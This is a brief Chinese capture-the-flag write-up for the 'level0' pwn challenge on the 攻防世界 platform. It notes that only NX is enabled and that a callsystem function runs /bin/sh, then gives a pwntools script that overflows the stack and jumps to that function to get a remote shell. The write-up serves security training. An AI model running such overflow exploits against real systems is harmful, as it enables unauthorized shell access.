攻防世界(8):level0
查壳,只开了NX,可以利用栈溢出
ida中的callsystem函数调用了/bin/sh
这题练习一下elf调用函数地址写exp
#!/usr/bin/env python
from pwn import *
p = remote('111.200.241.244',35917)
elf = ELF('./level0')
sysaddr = elf.symbols['callsystem']
payload = 'a'* 136 + p64(sysaddr)
p.recv()
p.send(payload)
p.interactive()